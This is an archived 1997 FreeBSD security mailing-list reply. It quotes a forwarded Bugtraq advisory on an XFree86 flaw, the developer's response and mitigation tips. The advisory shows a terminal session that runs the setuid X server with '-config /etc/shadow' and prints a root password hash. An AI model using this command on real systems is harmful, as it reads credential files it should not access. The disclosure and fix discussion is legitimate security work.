Date: Sun, 23 Nov 1997 13:20:20 -0500 (EST) From: spork <spork@super-g.com> To: David Dawes <dawes@rf900.physics.usyd.edu.au> Cc: Philippe Regnauld <regnauld@deepo.prosa.dk>, freebsd-security@FreeBSD.ORG Subject: Re: Fwd: "XFree86 insecurity" <root@SHEGG.RH1.IIT.EDU> Message-ID: <Pine.BSF.3.96.971123131801.1101A-100000@super-g.inch.com> In-Reply-To: <19971122192453.17451@rf900.physics.usyd.edu.au>
next in thread | previous in thread | raw e-mail | index | archive | help
A quick fix I already had in place from the old xterm exploits was to put
all the people that use X (well, just me) in a group and make the X
binaries with suid bits only executable by that group rather than
world-execute. While it's not truly a fix, it does limit your
vulnerability. I've yet to play with XDM...
Charles Sprickman
spork@super-g.com
----
"I'm not a prophet or a stone-age man
Just a mortal with potential of a superman
I'm living on" -DB
On Sat, 22 Nov 1997, David Dawes wrote:
> On Sat, Nov 22, 1997 at 08:23:50AM +0100, Philippe Regnauld wrote:
>
> We (XFree86) are aware of this one. I agree with the recomendation of
> removing the setuid bit and using xdm to start the Xserver, and if you
> have XFree86 on a machine where this problem is significant, you should
> consider doing this.
>
> The fix is to disable the '-config' Xserver option. This will be removed
> in our next release, and also in the next X11 release from The Open
> Group. It was only added to get around problems on OS's with small
> command line length limits, and should never have been enabled for most
> Unix-like OSs. The problem isn't XFree86-specific. It affects any
> platform using X11R6 XC/TOG code where the Xserver is installed setuid
> root (although on non-XFree86 platforms you may need to be a little more
> inventive with the use of the -config option).
>
> David
>
> >Cute one.
> >
> >-----Forwarded message from shegget <root@SHEGG.RH1.IIT.EDU>-----
> >
> >Date: Fri, 21 Nov 1997 18:35:36 +0000
> >From: shegget <root@SHEGG.RH1.IIT.EDU>
> >Subject: XFree86 insecurity
> >To: BUGTRAQ@NETSPACE.ORG
> >
> > plaguez security advisory n.10
> >
> > XFree86 insecurity
> >
> >
> >
> >
> >Program: XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...)
> >
> >Version: Tested on XFree86 3.3.1 (current), 3.2.9 and 3.1.2.
> > Other versions as well.
> >
> >OS: All
> >
> >Impact: The XFree86 servers let you specify an alternate configuration
> > file and do not check whether you have rights to read it.
> > Any user can read files with root permissions.
> >
> >
> >
> >
> >hello,
> >just a short one to tell you about this "feature" I found in all default
> >XFree86 servers...
> >
> >
> >Here it is:
> >
> >Script started on Sat Aug 23 15:32:36 1997
> >Loading /usr/lib/kbd/keytables/fr-latin1.map
> >[plaguez@plaguez plaguez]$ uname -a
> >Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586
> >[plaguez@plaguez plaguez]$ ls -al /etc/shadow
> >-rw------- 1 root bin 1039 Aug 21 20:12 /etc/shadow
> >[plaguez@plaguez bin]$ id
> >uid=502(plaguez) gid=500(users) groups=500(users)
> >[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin
> >[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow
> >Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
> >use: X [:<display>] [option]
> >-a # mouse acceleration (pixels)
> >-ac disable access control restrictions
> >-audit int set audit trail level
> >-auth file select authorization file
> >bc enable bug compatibility
> >-bs disable any backing store support
> >-c turns off key-click
> >
> >... and so on. HINT: look at the first XF86_SVGA output line.
> >
> >
> >
> >
> >
> >Patch:
> >------
> >
> >If you run xdm, you should consider removing the setuid bit of the
> >servers.
> >
> >If not, well, wait for the XFree86 Project to bring you a patch, since I'm
> >too lazy to find and fix it.
> >
> >
> >
> >
> >
> >later,
> >
> >-plaguez
> >dube0866@eurobretagne.fr
> >
> >-----End of forwarded message-----
> >
> >--
> > -- Phil
> >
> > -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
>
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.96.971123131801.1101A-100000>
